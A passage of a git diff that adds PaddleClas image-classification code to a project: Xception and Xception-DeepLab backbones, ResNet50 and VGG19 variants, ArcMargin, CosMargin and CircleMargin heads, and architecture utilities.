name="middle_flow_5") + self._conv_6 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_6") + self._conv_7 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_7") + if block_num == 16: + self._conv_8 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_8") + self._conv_9 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_9") + self._conv_10 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_10") + self._conv_11 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_11") + self._conv_12 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_12") + self._conv_13 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_13") + self._conv_14 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_14") + self._conv_15 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_15") + + def forward(self, inputs): + x = self._conv_0(inputs) + x = self._conv_1(x) + x = self._conv_2(x) + x = self._conv_3(x) + x = self._conv_4(x) + x = self._conv_5(x) + x = self._conv_6(x) + x = self._conv_7(x) + if self.block_num == 16: + x = self._conv_8(x) + x = self._conv_9(x) + x = self._conv_10(x) + x = self._conv_11(x) + x = self._conv_12(x) + x = self._conv_13(x) + x = self._conv_14(x) + x = self._conv_15(x) + return x + + +class ExitFlowBottleneckBlock(nn.Layer): + def __init__(self, input_channels, output_channels1, output_channels2, + name): + super(ExitFlowBottleneckBlock, self).__init__() + + self._short = Conv2D( + in_channels=input_channels, + out_channels=output_channels2, + kernel_size=1, + stride=2, + padding=0, + weight_attr=ParamAttr(name + "_branch1_weights"), + bias_attr=False) + self._conv_1 = SeparableConv( + input_channels, + output_channels1, + stride=1, + name=name + "_branch2a_weights") + self._conv_2 = SeparableConv( + output_channels1, + output_channels2, + stride=1, + name=name + "_branch2b_weights") + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=1) + + def forward(self, inputs): + short = self._short(inputs) + conv0 = F.relu(inputs) + conv1 = self._conv_1(conv0) + conv2 = F.relu(conv1) + conv2 = self._conv_2(conv2) + pool = self._pool(conv2) + return paddle.add(x=short, y=pool) + + +class ExitFlow(nn.Layer): + def __init__(self, class_num): + super(ExitFlow, self).__init__() + + name = "exit_flow" + + self._conv_0 = ExitFlowBottleneckBlock( + 728, 728, 1024, name=name + "_1") + self._conv_1 = SeparableConv(1024, 1536, stride=1, name=name + "_2") + self._conv_2 = SeparableConv(1536, 2048, stride=1, name=name + "_3") + self._pool = AdaptiveAvgPool2D(1) + stdv = 1.0 / math.sqrt(2048 * 1.0) + self._out = Linear( + 2048, + class_num, + weight_attr=ParamAttr( + name="fc_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + conv0 = self._conv_0(inputs) + conv1 = self._conv_1(conv0) + conv1 = F.relu(conv1) + conv2 = self._conv_2(conv1) + conv2 = F.relu(conv2) + pool = self._pool(conv2) + pool = paddle.flatten(pool, start_axis=1, stop_axis=-1) + out = self._out(pool) + return out + + +class Xception(nn.Layer): + def __init__(self, + entry_flow_block_num=3, + middle_flow_block_num=8, + class_num=1000): + super(Xception, self).__init__() + self.entry_flow_block_num = entry_flow_block_num + self.middle_flow_block_num = middle_flow_block_num + self._entry_flow = EntryFlow(entry_flow_block_num) + self._middle_flow = MiddleFlow(middle_flow_block_num) + self._exit_flow = ExitFlow(class_num) + + def forward(self, inputs): + x = self._entry_flow(inputs) + x = self._middle_flow(x) + x = self._exit_flow(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def Xception41(pretrained=False, use_ssld=False, **kwargs): + model = Xception(entry_flow_block_num=3, middle_flow_block_num=8, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception41"], use_ssld=use_ssld) + return model + + +def Xception65(pretrained=False, use_ssld=False, **kwargs): + model = Xception( + entry_flow_block_num=3, middle_flow_block_num=16, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception65"], use_ssld=use_ssld) + return model + + +def Xception71(pretrained=False, use_ssld=False, **kwargs): + model = Xception( + entry_flow_block_num=5, middle_flow_block_num=16, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception71"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception_deeplab.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception_deeplab.py new file mode 100644 index 0000000..c52769b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception_deeplab.py @@ -0,0 +1,421 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "Xception41_deeplab": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception41_deeplab_pretrained.pdparams", + "Xception65_deeplab": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception65_deeplab_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +def check_data(data, number): + if type(data) == int: + return [data] * number + assert len(data) == number + return data + + +def check_stride(s, os): + if s <= os: + return True + else: + return False + + +def check_points(count, points): + if points is None: + return False + else: + if isinstance(points, list): + return (True if count in points else False) + else: + return (True if count == points else False) + + +def gen_bottleneck_params(backbone='xception_65'): + if backbone == 'xception_65': + bottleneck_params = { + "entry_flow": (3, [2, 2, 2], [128, 256, 728]), + "middle_flow": (16, 1, 728), + "exit_flow": (2, [2, 1], [[728, 1024, 1024], [1536, 1536, 2048]]) + } + elif backbone == 'xception_41': + bottleneck_params = { + "entry_flow": (3, [2, 2, 2], [128, 256, 728]), + "middle_flow": (8, 1, 728), + "exit_flow": (2, [2, 1], [[728, 1024, 1024], [1536, 1536, 2048]]) + } + elif backbone == 'xception_71': + bottleneck_params = { + "entry_flow": (5, [2, 1, 2, 1, 2], [128, 256, 256, 728, 728]), + "middle_flow": (16, 1, 728), + "exit_flow": (2, [2, 1], [[728, 1024, 1024], [1536, 1536, 2048]]) + } + else: + raise Exception( + "xception backbont only support xception_41/xception_65/xception_71" + ) + return bottleneck_params + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride=1, + padding=0, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=padding, + weight_attr=ParamAttr(name=name + "/weights"), + bias_attr=False) + self._bn = BatchNorm( + num_channels=output_channels, + act=act, + epsilon=1e-3, + momentum=0.99, + param_attr=ParamAttr(name=name + "/BatchNorm/gamma"), + bias_attr=ParamAttr(name=name + "/BatchNorm/beta"), + moving_mean_name=name + "/BatchNorm/moving_mean", + moving_variance_name=name + "/BatchNorm/moving_variance") + + def forward(self, inputs): + return self._bn(self._conv(inputs)) + + +class Seperate_Conv(nn.Layer): + def __init__(self, + input_channels, + output_channels, + stride, + filter, + dilation=1, + act=None, + name=None): + super(Seperate_Conv, self).__init__() + + self._conv1 = Conv2D( + in_channels=input_channels, + out_channels=input_channels, + kernel_size=filter, + stride=stride, + groups=input_channels, + padding=(filter) // 2 * dilation, + dilation=dilation, + weight_attr=ParamAttr(name=name + "/depthwise/weights"), + bias_attr=False) + self._bn1 = BatchNorm( + input_channels, + act=act, + epsilon=1e-3, + momentum=0.99, + param_attr=ParamAttr(name=name + "/depthwise/BatchNorm/gamma"), + bias_attr=ParamAttr(name=name + "/depthwise/BatchNorm/beta"), + moving_mean_name=name + "/depthwise/BatchNorm/moving_mean", + moving_variance_name=name + "/depthwise/BatchNorm/moving_variance") + self._conv2 = Conv2D( + input_channels, + output_channels, + 1, + stride=1, + groups=1, + padding=0, + weight_attr=ParamAttr(name=name + "/pointwise/weights"), + bias_attr=False) + self._bn2 = BatchNorm( + output_channels, + act=act, + epsilon=1e-3, + momentum=0.99, + param_attr=ParamAttr(name=name + "/pointwise/BatchNorm/gamma"), + bias_attr=ParamAttr(name=name + "/pointwise/BatchNorm/beta"), + moving_mean_name=name + "/pointwise/BatchNorm/moving_mean", + moving_variance_name=name + "/pointwise/BatchNorm/moving_variance") + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._bn1(x) + x = self._conv2(x) + x = self._bn2(x) + return x + + +class Xception_Block(nn.Layer): + def __init__(self, + input_channels, + output_channels, + strides=1, + filter_size=3, + dilation=1, + skip_conv=True, + has_skip=True, + activation_fn_in_separable_conv=False, + name=None): + super(Xception_Block, self).__init__() + + repeat_number = 3 + output_channels = check_data(output_channels, repeat_number) + filter_size = check_data(filter_size, repeat_number) + strides = check_data(strides, repeat_number) + + self.has_skip = has_skip + self.skip_conv = skip_conv + self.activation_fn_in_separable_conv = activation_fn_in_separable_conv + if not activation_fn_in_separable_conv: + self._conv1 = Seperate_Conv( + input_channels, + output_channels[0], + stride=strides[0], + filter=filter_size[0], + dilation=dilation, + name=name + "/separable_conv1") + self._conv2 = Seperate_Conv( + output_channels[0], + output_channels[1], + stride=strides[1], + filter=filter_size[1], + dilation=dilation, + name=name + "/separable_conv2") + self._conv3 = Seperate_Conv( + output_channels[1], + output_channels[2], + stride=strides[2], + filter=filter_size[2], + dilation=dilation, + name=name + "/separable_conv3") + else: + self._conv1 = Seperate_Conv( + input_channels, + output_channels[0], + stride=strides[0], + filter=filter_size[0], + act="relu", + dilation=dilation, + name=name + "/separable_conv1") + self._conv2 = Seperate_Conv( + output_channels[0], + output_channels[1], + stride=strides[1], + filter=filter_size[1], + act="relu", + dilation=dilation, + name=name + "/separable_conv2") + self._conv3 = Seperate_Conv( + output_channels[1], + output_channels[2], + stride=strides[2], + filter=filter_size[2], + act="relu", + dilation=dilation, + name=name + "/separable_conv3") + + if has_skip and skip_conv: + self._short = ConvBNLayer( + input_channels, + output_channels[-1], + 1, + stride=strides[-1], + padding=0, + name=name + "/shortcut") + + def forward(self, inputs): + if not self.activation_fn_in_separable_conv: + x = F.relu(inputs) + x = self._conv1(x) + x = F.relu(x) + x = self._conv2(x) + x = F.relu(x) + x = self._conv3(x) + else: + x = self._conv1(inputs) + x = self._conv2(x) + x = self._conv3(x) + if self.has_skip: + if self.skip_conv: + skip = self._short(inputs) + else: + skip = inputs + return paddle.add(x, skip) + else: + return x + + +class XceptionDeeplab(nn.Layer): + def __init__(self, backbone, class_num=1000): + super(XceptionDeeplab, self).__init__() + + bottleneck_params = gen_bottleneck_params(backbone) + self.backbone = backbone + + self._conv1 = ConvBNLayer( + 3, + 32, + 3, + stride=2, + padding=1, + act="relu", + name=self.backbone + "/entry_flow/conv1") + self._conv2 = ConvBNLayer( + 32, + 64, + 3, + stride=1, + padding=1, + act="relu", + name=self.backbone + "/entry_flow/conv2") + + self.block_num = bottleneck_params["entry_flow"][0] + self.strides = bottleneck_params["entry_flow"][1] + self.chns = bottleneck_params["entry_flow"][2] + self.strides = check_data(self.strides, self.block_num) + self.chns = check_data(self.chns, self.block_num) + + self.entry_flow = [] + self.middle_flow = [] + + self.stride = 2 + self.output_stride = 32 + s = self.stride + + for i in range(self.block_num): + stride = self.strides[i] if check_stride(s * self.strides[i], + self.output_stride) else 1 + xception_block = self.add_sublayer( + self.backbone + "/entry_flow/block" + str(i + 1), + Xception_Block( + input_channels=64 if i == 0 else self.chns[i - 1], + output_channels=self.chns[i], + strides=[1, 1, self.stride], + name=self.backbone + "/entry_flow/block" + str(i + 1))) + self.entry_flow.append(xception_block) + s = s * stride + self.stride = s + + self.block_num = bottleneck_params["middle_flow"][0] + self.strides = bottleneck_params["middle_flow"][1] + self.chns = bottleneck_params["middle_flow"][2] + self.strides = check_data(self.strides, self.block_num) + self.chns = check_data(self.chns, self.block_num) + s = self.stride + + for i in range(self.block_num): + stride = self.strides[i] if check_stride(s * self.strides[i], + self.output_stride) else 1 + xception_block = self.add_sublayer( + self.backbone + "/middle_flow/block" + str(i + 1), + Xception_Block( + input_channels=728, + output_channels=728, + strides=[1, 1, self.strides[i]], + skip_conv=False, + name=self.backbone + "/middle_flow/block" + str(i + 1))) + self.middle_flow.append(xception_block) + s = s * stride + self.stride = s + + self.block_num = bottleneck_params["exit_flow"][0] + self.strides = bottleneck_params["exit_flow"][1] + self.chns = bottleneck_params["exit_flow"][2] + self.strides = check_data(self.strides, self.block_num) + self.chns = check_data(self.chns, self.block_num) + s = self.stride + stride = self.strides[0] if check_stride(s * self.strides[0], + self.output_stride) else 1 + self._exit_flow_1 = Xception_Block( + 728, + self.chns[0], [1, 1, stride], + name=self.backbone + "/exit_flow/block1") + s = s * stride + stride = self.strides[1] if check_stride(s * self.strides[1], + self.output_stride) else 1 + self._exit_flow_2 = Xception_Block( + self.chns[0][-1], + self.chns[1], [1, 1, stride], + dilation=2, + has_skip=False, + activation_fn_in_separable_conv=True, + name=self.backbone + "/exit_flow/block2") + s = s * stride + + self.stride = s + + self._drop = Dropout(p=0.5, mode="downscale_in_infer") + self._pool = AdaptiveAvgPool2D(1) + self._fc = Linear( + self.chns[1][-1], + class_num, + weight_attr=ParamAttr(name="fc_weights"), + bias_attr=ParamAttr(name="fc_bias")) + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + for ef in self.entry_flow: + x = ef(x) + for mf in self.middle_flow: + x = mf(x) + x = self._exit_flow_1(x) + x = self._exit_flow_2(x) + x = self._drop(x) + x = self._pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def Xception41_deeplab(pretrained=False, use_ssld=False, **kwargs): + model = XceptionDeeplab('xception_41', **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception41_deeplab"], use_ssld=use_ssld) + return model + + +def Xception65_deeplab(pretrained=False, use_ssld=False, **kwargs): + model = XceptionDeeplab("xception_65", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception65_deeplab"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/__init__.py new file mode 100644 index 0000000..34fcdeb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/__init__.py @@ -0,0 +1,2 @@ +from .resnet_variant import ResNet50_last_stage_stride1 +from .vgg_variant import VGG19Sigmoid diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/resnet_variant.py b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/resnet_variant.py new file mode 100644 index 0000000..08042ad --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/resnet_variant.py @@ -0,0 +1,23 @@ +from paddle.nn import Conv2D +from ppcls.arch.backbone.legendary_models.resnet import ResNet50, MODEL_URLS, _load_pretrained + +__all__ = ["ResNet50_last_stage_stride1"] + + +def ResNet50_last_stage_stride1(pretrained=False, use_ssld=False, **kwargs): + def replace_function(conv): + new_conv = Conv2D( + in_channels=conv._in_channels, + out_channels=conv._out_channels, + kernel_size=conv._kernel_size, + stride=1, + padding=conv._padding, + groups=conv._groups, + bias_attr=conv._bias_attr) + return new_conv + + match_re = "conv2d_4[4|6]" + model = ResNet50(pretrained=False, use_ssld=use_ssld, **kwargs) + model.replace_sub(match_re, replace_function, True) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet50"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/vgg_variant.py b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/vgg_variant.py new file mode 100644 index 0000000..b73ad35 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/vgg_variant.py @@ -0,0 +1,28 @@ +import paddle +from paddle.nn import Sigmoid +from ppcls.arch.backbone.legendary_models.vgg import VGG19 + +__all__ = ["VGG19Sigmoid"] + + +class SigmoidSuffix(paddle.nn.Layer): + def __init__(self, origin_layer): + super(SigmoidSuffix, self).__init__() + self.origin_layer = origin_layer + self.sigmoid = Sigmoid() + + def forward(self, input, res_dict=None, **kwargs): + x = self.origin_layer(input) + x = self.sigmoid(x) + return x + + +def VGG19Sigmoid(pretrained=False, use_ssld=False, **kwargs): + def replace_function(origin_layer): + new_layer = SigmoidSuffix(origin_layer) + return new_layer + + match_re = "linear_2" + model = VGG19(pretrained=pretrained, use_ssld=use_ssld, **kwargs) + model.replace_sub(match_re, replace_function, True) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/__init__.py b/Smart_container/PaddleClas/ppcls/arch/gears/__init__.py new file mode 100644 index 0000000..75ca41d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/__init__.py @@ -0,0 +1,32 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from .arcmargin import ArcMargin +from .cosmargin import CosMargin +from .circlemargin import CircleMargin +from .fc import FC +from .vehicle_neck import VehicleNeck + +__all__ = ['build_gear'] + + +def build_gear(config): + support_dict = [ + 'ArcMargin', 'CosMargin', 'CircleMargin', 'FC', 'VehicleNeck' + ] + module_name = config.pop('name') + assert module_name in support_dict, Exception( + 'head only support {}'.format(support_dict)) + module_class = eval(module_name)(**config) + return module_class diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/arcmargin.py b/Smart_container/PaddleClas/ppcls/arch/gears/arcmargin.py new file mode 100644 index 0000000..22cc76e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/arcmargin.py @@ -0,0 +1,72 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn +import math + + +class ArcMargin(nn.Layer): + def __init__(self, + embedding_size, + class_num, + margin=0.5, + scale=80.0, + easy_margin=False): + super().__init__() + self.embedding_size = embedding_size + self.class_num = class_num + self.margin = margin + self.scale = scale + self.easy_margin = easy_margin + self.weight = self.create_parameter( + shape=[self.embedding_size, self.class_num], + is_bias=False, + default_initializer=paddle.nn.initializer.XavierNormal()) + + def forward(self, input, label=None): + input_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + input = paddle.divide(input, input_norm) + + weight_norm = paddle.sqrt( + paddle.sum(paddle.square(self.weight), axis=0, keepdim=True)) + weight = paddle.divide(self.weight, weight_norm) + + cos = paddle.matmul(input, weight) + if not self.training or label is None: + return cos + sin = paddle.sqrt(1.0 - paddle.square(cos) + 1e-6) + cos_m = math.cos(self.margin) + sin_m = math.sin(self.margin) + phi = cos * cos_m - sin * sin_m + + th = math.cos(self.margin) * (-1) + mm = math.sin(self.margin) * self.margin + if self.easy_margin: + phi = self._paddle_where_more_than(cos, 0, phi, cos) + else: + phi = self._paddle_where_more_than(cos, th, phi, cos - mm) + + one_hot = paddle.nn.functional.one_hot(label, self.class_num) + one_hot = paddle.squeeze(one_hot, axis=[1]) + output = paddle.multiply(one_hot, phi) + paddle.multiply( + (1.0 - one_hot), cos) + output = output * self.scale + return output + + def _paddle_where_more_than(self, target, limit, x, y): + mask = paddle.cast(x=(target > limit), dtype='float32') + output = paddle.multiply(mask, x) + paddle.multiply((1.0 - mask), y) + return output diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/circlemargin.py b/Smart_container/PaddleClas/ppcls/arch/gears/circlemargin.py new file mode 100644 index 0000000..d1bce83 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/circlemargin.py @@ -0,0 +1,59 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import math +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class CircleMargin(nn.Layer): + def __init__(self, embedding_size, class_num, margin, scale): + super(CircleMargin, self).__init__() + self.scale = scale + self.margin = margin + self.embedding_size = embedding_size + self.class_num = class_num + + self.weight = self.create_parameter( + shape=[self.embedding_size, self.class_num], + is_bias=False, + default_initializer=paddle.nn.initializer.XavierNormal()) + + def forward(self, input, label): + feat_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + input = paddle.divide(input, feat_norm) + + weight_norm = paddle.sqrt( + paddle.sum(paddle.square(self.weight), axis=0, keepdim=True)) + weight = paddle.divide(self.weight, weight_norm) + + logits = paddle.matmul(input, weight) + if not self.training or label is None: + return logits + + alpha_p = paddle.clip(-logits.detach() + 1 + self.margin, min=0.) + alpha_n = paddle.clip(logits.detach() + self.margin, min=0.) + delta_p = 1 - self.margin + delta_n = self.margin + + m_hot = F.one_hot(label.reshape([-1]), num_classes=logits.shape[1]) + + logits_p = alpha_p * (logits - delta_p) + logits_n = alpha_n * (logits - delta_n) + pre_logits = logits_p * m_hot + logits_n * (1 - m_hot) + pre_logits = self.scale * pre_logits + + return pre_logits diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/cosmargin.py b/Smart_container/PaddleClas/ppcls/arch/gears/cosmargin.py new file mode 100644 index 0000000..578b64c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/cosmargin.py @@ -0,0 +1,55 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import math +import paddle.nn as nn + + +class CosMargin(paddle.nn.Layer): + def __init__(self, embedding_size, class_num, margin=0.35, scale=64.0): + super(CosMargin, self).__init__() + self.scale = scale + self.margin = margin + self.embedding_size = embedding_size + self.class_num = class_num + + self.weight = self.create_parameter( + shape=[self.embedding_size, self.class_num], + is_bias=False, + default_initializer=paddle.nn.initializer.XavierNormal()) + + def forward(self, input, label): + label.stop_gradient = True + + input_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + input = paddle.divide(input, input_norm) + + weight_norm = paddle.sqrt( + paddle.sum(paddle.square(self.weight), axis=0, keepdim=True)) + weight = paddle.divide(self.weight, weight_norm) + + cos = paddle.matmul(input, weight) + if not self.training or label is None: + return cos + + cos_m = cos - self.margin + + one_hot = paddle.nn.functional.one_hot(label, self.class_num) + one_hot = paddle.squeeze(one_hot, axis=[1]) + output = paddle.multiply(one_hot, cos_m) + paddle.multiply( + (1.0 - one_hot), cos) + output = output * self.scale + return output diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/fc.py b/Smart_container/PaddleClas/ppcls/arch/gears/fc.py new file mode 100644 index 0000000..b324741 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/fc.py @@ -0,0 +1,35 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import paddle +import paddle.nn as nn + + +class FC(nn.Layer): + def __init__(self, embedding_size, class_num): + super(FC, self).__init__() + self.embedding_size = embedding_size + self.class_num = class_num + weight_attr = paddle.ParamAttr( + initializer=paddle.nn.initializer.XavierNormal()) + self.fc = paddle.nn.Linear( + self.embedding_size, self.class_num, weight_attr=weight_attr) + + def forward(self, input, label=None): + out = self.fc(input) + return out diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/identity_head.py b/Smart_container/PaddleClas/ppcls/arch/gears/identity_head.py new file mode 100644 index 0000000..7d11e57 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/identity_head.py @@ -0,0 +1,9 @@ +from paddle import nn + + +class IdentityHead(nn.Layer): + def __init__(self): + super(IdentityHead, self).__init__() + + def forward(self, x, label=None): + return {"features": x, "logits": None} diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/vehicle_neck.py b/Smart_container/PaddleClas/ppcls/arch/gears/vehicle_neck.py new file mode 100644 index 0000000..05f4e33 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/vehicle_neck.py @@ -0,0 +1,52 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import paddle +import paddle.nn as nn + + +class VehicleNeck(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size=1, + stride=1, + padding=0, + dilation=1, + groups=1, + padding_mode='zeros', + weight_attr=None, + bias_attr=None, + data_format='NCHW'): + super().__init__() + self.conv = nn.Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + dilation=dilation, + groups=groups, + padding_mode=padding_mode, + weight_attr=weight_attr, + bias_attr=weight_attr, + data_format=data_format) + self.flatten = nn.Flatten() + + def forward(self, x): + x = self.conv(x) + x = self.flatten(x) + return x diff --git a/Smart_container/PaddleClas/ppcls/arch/utils.py b/Smart_container/PaddleClas/ppcls/arch/utils.py new file mode 100644 index 0000000..308475d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/utils.py @@ -0,0 +1,53 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import six +import types +from difflib import SequenceMatcher + +from . import backbone + + +def get_architectures(): + """ + get all of model architectures + """ + names = [] + for k, v in backbone.__dict__.items(): + if isinstance(v, (types.FunctionType, six.class_types)): + names.append(k) + return names + + +def get_blacklist_model_in_static_mode(): + from ppcls.arch.backbone import distilled_vision_transformer + from ppcls.arch.backbone import vision_transformer + blacklist = distilled_vision_transformer.__all__ + vision_transformer.__all__ + return blacklist + + +def similar_architectures(name='', names=[], thresh=0.1, topk=10): + """ + inferred similar architectures + """ + scores = [] + for idx, n in enumerate(names): + if n.startswith('__'): + continue + score = SequenceMatcher(None, n.lower(), name.lower()).quick_ratio() + if score > thresh: + scores.append((idx, score)) + scores.sort(key=lambda x: x[1], reverse=True) + similar_names = [names[s[0]] for s in scores[:min(topk, len(scores))]] + return similar_names diff --git a/Smart_container/PaddleClas/ppcls/configs/Cartoonface/ResNet50_icartoon.yaml b/Smart_container/PaddleClas/ppcls/configs/Cartoonface/ResNet50_icartoon.yaml new file mode 100644 index 0000000..69265ec --- /dev/null +++ 